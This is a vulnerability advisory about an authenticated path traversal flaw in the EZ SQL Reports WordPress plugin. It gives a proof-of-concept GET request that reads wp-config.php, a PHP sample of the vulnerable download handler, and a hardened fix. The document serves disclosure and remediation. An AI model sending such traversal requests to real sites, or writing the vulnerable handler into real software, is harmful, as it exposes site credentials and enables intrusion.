EZ SQL Reports <= 4.11.33 - Authenticated Arbitrary File Download
The plugin allows a WordPress site administrator or collaborator to download arbitrary files from the host file system through the plugin feature for downloading the .sql, .sql.zip or .sql.gz backup files created by the WordPress administrator. The file name passed in the request is not sanitized, so a path traversal sequence can be injected to read any file the web server user can access, for example wp-config.php.
Proof of Concept

GET /wp-admin/admin.php?page=ELISQLREPORTS-settings&Download_SQL_Backup=../../../wp-config.php HTTP/1.1
Host: <the host with the wordpress>
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: <User-Agent>
Referer: http://<the host with the wordpress>/wp-admin/admin.php?page=ELISQLREPORTS-settings
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_[...etc...]4af418c3efd
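The traversal above works because the requested file name is joined onto the backup directory and handed to the file system as-is. The following is an added example written for this advisory, not the plugin's own code: a minimal WordPress admin download handler in the vulnerable shape, next to a hardened version that applies a capability check, a nonce, basename() to reject any path component, an extension allowlist matching the backup types the page names, and a realpath() containment check. The function names, the nonce action and the EXAMPLE_BACKUP_DIR location are assumptions; only the Download_SQL_Backup parameter comes from the page.

```php
<?php
// Added example for this advisory. Not the plugin's code: the function names,
// the nonce action and the backup directory below are assumptions.

// Assumed location for the .sql / .sql.zip / .sql.gz backups.
define( 'EXAMPLE_BACKUP_DIR', WP_CONTENT_DIR . '/uploads/example-sql-backups' );

/**
 * Vulnerable shape (illustrative): the request parameter is concatenated onto
 * the backup directory, so Download_SQL_Backup=../../../wp-config.php walks
 * out of it and readfile() serves the site's database credentials.
 */
function example_download_backup_vulnerable() {
	$file = EXAMPLE_BACKUP_DIR . '/' . $_GET['Download_SQL_Backup'];
	header( 'Content-Type: application/octet-stream' );
	header( 'Content-Disposition: attachment; filename="' . basename( $file ) . '"' );
	readfile( $file );
	exit;
}

/**
 * Hardened handler. Each check closes a distinct hole:
 *  - current_user_can(): only administrators may trigger the download;
 *  - check_admin_referer(): a nonce blocks CSRF-style link delivery;
 *  - basename() !== input: any directory component, including "../", is rejected;
 *  - the regex allowlist: only the backup extensions the feature is meant to serve;
 *  - realpath() prefix test: symlinks or encoded traversal cannot leave the directory.
 */
function example_download_backup_hardened() {
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_die( 'Insufficient privileges.', '', array( 'response' => 403 ) );
	}
	check_admin_referer( 'example_download_backup' ); // assumed nonce action

	$requested = isset( $_GET['Download_SQL_Backup'] ) ? wp_unslash( $_GET['Download_SQL_Backup'] ) : '';
	$name      = basename( $requested );
	if ( '' === $name || $name !== $requested ) {
		wp_die( 'Invalid file name.', '', array( 'response' => 400 ) );
	}
	if ( ! preg_match( '/^[A-Za-z0-9][A-Za-z0-9._-]*\.sql(\.zip|\.gz)?$/', $name ) ) {
		wp_die( 'Not a backup file.', '', array( 'response' => 400 ) );
	}

	$base = realpath( EXAMPLE_BACKUP_DIR );
	$path = realpath( EXAMPLE_BACKUP_DIR . '/' . $name );
	// Compare against "$base/" so a sibling directory sharing the prefix
	// (e.g. example-sql-backups-old) is not accepted.
	if ( false === $base || false === $path
		|| 0 !== strpos( $path, $base . DIRECTORY_SEPARATOR ) ) {
		wp_die( 'File not found.', '', array( 'response' => 404 ) );
	}

	header( 'Content-Type: application/octet-stream' );
	header( 'Content-Disposition: attachment; filename="' . $name . '"' );
	header( 'Content-Length: ' . filesize( $path ) );
	readfile( $path );
	exit;
}
```

For the hardened handler to accept a request, the download link has to carry the nonce, e.g. wp_nonce_url( admin_url( 'admin.php?page=...&Download_SQL_Backup=site.sql.gz' ), 'example_download_backup' ). Against the proof-of-concept request, the basename() comparison already rejects ../../../wp-config.php; the realpath() test is the backstop for cases basename() does not cover, such as a symlink planted inside the backup directory.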
Fixed in version 4.11.37

| Publicly Published | 2015-09-14 |
| Added | 2015-09-15 |
| Last Updated | 2015-09-15 |
Copyright & License

| Copyright | All data and resources contained within this page and this web site are Copyright © The WPScan Team. |
| License | Some of this data may be used for non-commercial purposes; any potential commercial usage of this data requires a license. To inquire about a commercial license, contact the WPScan Team. |